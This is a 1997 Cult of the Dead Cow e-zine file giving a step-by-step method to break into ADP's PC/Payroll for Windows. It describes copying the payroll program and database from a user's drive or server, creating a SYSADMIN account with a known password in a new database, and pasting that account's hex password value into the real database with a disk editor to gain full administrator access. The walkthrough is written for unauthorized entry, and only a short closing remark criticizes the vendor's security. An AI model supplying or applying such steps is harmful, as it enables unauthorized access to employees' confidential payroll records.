173 lines
7.8 KiB
Plaintext
173 lines
7.8 KiB
Plaintext
|
|
_
|
|
| \
|
|
| \
|
|
| | \
|
|
__ | |\ \ __
|
|
_____________ _/_/ | | \ \ _/_/ _____________
|
|
| ___________ _/_/ | | \ \ _/_/ ___________ |
|
|
| | _/_/_____ | | > > _/_/_____ | |
|
|
| | /________/ | | / / /________/ | |
|
|
| | | | / / | |
|
|
| | | |/ / | |
|
|
| | | | / | |
|
|
| | | / | |
|
|
| | |_/ | |
|
|
| | | |
|
|
| | c o m m u n i c a t i o n s | |
|
|
| |________________________________________________________________| |
|
|
|____________________________________________________________________|
|
|
|
|
...presents... Hacking PC/Payroll for Windows
|
|
by Tarkin Darklighter
|
|
09/01/1997-#340
|
|
|
|
__///////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\\__
|
|
\\\\\\\/ Everything You Need Since 1986 \///////
|
|
___ _ _ ___ _ _ ___ _ _ ___ _ _ ___
|
|
|___heal_the_sick___raise_the_dead___cleanse_the_lepers___cast_out_demons___|
|
|
|
|
I. Introduction
|
|
|
|
Automated Data Processing (ADP) is the nation's largest provider of
|
|
computerized payroll transaction processing. PC/Payroll for Windows is
|
|
ADP's client/server front end for AutoPay, which is in use by over
|
|
225,000 clients and 20 million employees (per ADP's 1996 annual report).
|
|
With PC/Payroll, you can either connect to a SQL server or use their
|
|
run-time SQL server engine to access a local database. If the company
|
|
in question is using either option the security is quite trivial.
|
|
When you execute PC/Payroll, you are asked for a user name and password.
|
|
The natural inclination in a case like this is to just "brute force"
|
|
your way into the program via a word list. Fortunately, there are some
|
|
major security flaws in their database structure.
|
|
So, let's get to it.
|
|
|
|
|
|
II. Tools
|
|
|
|
A. PC Payroll and its configuration
|
|
|
|
The first thing you'll need is a copy of PC/Payroll for Windows. If you
|
|
can't obtain the installation CD, you'll need to copy the \PCPW
|
|
directory from the user's hard drive or from the server. Also, be sure
|
|
and copy the MFCOLEUI.DLL file from the \WINDOWS\SYSTEM directory or you
|
|
won't be able to execute the program.
|
|
|
|
The actual payroll database file is usually stored in a subdirectory of
|
|
\PCPW. The default directory name is PAY4WIN and the default database
|
|
name is PAY4WIN.DBS. This database can get very large, so make sure you
|
|
have a lot of storage space available.
|
|
|
|
There are two INI files in the \PCPW directory that may be important:
|
|
SQL.INI and PAY4WIN.INI. Make sure that the entries in this file point
|
|
to the correct drive letter and directory on your system.
|
|
|
|
B. Disk editor
|
|
|
|
You'll also need a good disk editor to examine the database file. I
|
|
prefer Norton Disk Editor (DOS version 8.0), but remember that a lot of
|
|
these old editors won't work properly with the Win95's new FAT32 system.
|
|
You can really screw up your hard drive if you're not careful
|
|
|
|
|
|
III. Methodology
|
|
|
|
We're going to perform a basic "cut-and-paste" operation on the password
|
|
fields in the database. This is easily accomplished by creating a user
|
|
with a known password and copying their password field to the SYSADMIN's
|
|
password field.
|
|
|
|
The next question is exactly HOW to create a new user without actually
|
|
getting into the program first. Fortunately for us, ADP provides a SQL
|
|
database utility that will do just exactly that! We're going to create
|
|
a new database and then create a new user/password within that database:
|
|
|
|
To create a new database:
|
|
|
|
1. Start up the WINTALK.EXE utility.
|
|
2. Select Admin/Install Database.
|
|
3. Check the "Local" box.
|
|
4. Check the "New" box.
|
|
5. The Password field is not important. Just put whatever you want in
|
|
here.
|
|
6. Type in the name of a new database. (We'll use NEWDB in this
|
|
example.)
|
|
7. Click OK.
|
|
|
|
The new database should now be created. If you're having problems,
|
|
check the entries in the SQL.INI file.
|
|
|
|
Now, to create the user and password:
|
|
|
|
1. Select Session/Connect from within WINTALK.EXE.
|
|
2. Select NEWDB from the box on the left and click OK.
|
|
3. Select Security/New User from the menu bar.
|
|
4. Create a new user named SYSADMIN with password "PASSWORD" (it's not
|
|
case-sensitive) with DBA privileges and click OK.
|
|
5. Exit WINTALK.
|
|
|
|
The next step is to copy your new password into the original database
|
|
file. Let's take a look at the database:
|
|
|
|
Open the NEWDB.DBS file with your disk editor and search for the SECOND
|
|
instance of SYSADMIN. This is the Master User account that has full
|
|
access to everything in PC/Payroll.
|
|
|
|
The password field is located immediately after the user name. It's
|
|
made up of 16 hex numbers, beginning after a 10h. In our example above,
|
|
the hex numbers should read:
|
|
|
|
45 45 4B 46 4D 4B 46 48 4D 49 48 47 42 42 48 4B
|
|
|
|
You should get the same string of numbers if you used a password
|
|
of "PASSWORD". Write these numbers down.
|
|
|
|
Now, use your disk editor to open PAY4WIN.DBS. Search for the SECOND
|
|
instance of SYSADMIN again and locate the password field. If you can't
|
|
find a SYSADMIN user, locate the second instance of another user (like
|
|
the name of your payroll clerk) with sufficient privileges in
|
|
PC/Payroll.
|
|
|
|
All you have to do is to copy the string you created into the SYSADMIN's
|
|
password field, starting after 10h. Save your changes.
|
|
|
|
Start PAY4WIN.EXE, and login using SYSADMIN and PASSWORD. You should
|
|
have full access.
|
|
|
|
|
|
IV. Additional Notes
|
|
|
|
This hack has also been proven to work on Novell servers running SQL.
|
|
Just copy the database and log files from the server to your local
|
|
machine and proceed as above. Note that you will have to unload the SQL
|
|
NLM in order to grab the files. (You can copy them at will if the
|
|
server is running a utility like St. Bernard's Open File Manager).
|
|
|
|
|
|
V. Conclusion
|
|
|
|
I must admit, this is pretty weak security, especially for something as
|
|
important as payroll. Most companies guard their payroll information
|
|
VERY closely. There are a lot of ways ADP could have made this more
|
|
difficult. Simply encrypting the passwords using a unique number in
|
|
each database file would have been enough to make things much more
|
|
difficult!
|
|
|
|
.-. _ _ .-.
|
|
/ \ .-. ((___)) .-. / \
|
|
/.ooM \ / \ .-. [ x x ] .-. / \ /.ooM \
|
|
-/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
|
|
/lucky 13\ / \ / `-(' ')-' \ / \ /lucky 13\
|
|
\ / `-' (U) `-' \ /
|
|
`-' the original e-zine `-' _
|
|
Oooo eastside westside / ) __
|
|
/)(\ ( \ WORLDWIDE / ( / \
|
|
\__/ ) / Copyright (c) 1997 cDc communications and the author. \ ) \)(/
|
|
(_/ CULT OF THE DEAD COW is a registered trademark of oooO
|
|
cDc communications, PO Box 53011, Lubbock, TX, 79453, USA. _
|
|
oooO All rights reserved. Edited by Grandmaster Ratte'. __ ( \
|
|
/ ) /)(\ / \ ) \
|
|
\ ( \__/ Save yourself! Go outside! Do something! \)(/ ( /
|
|
\_) xXx BOW to the COW xXx Oooo
|
|
|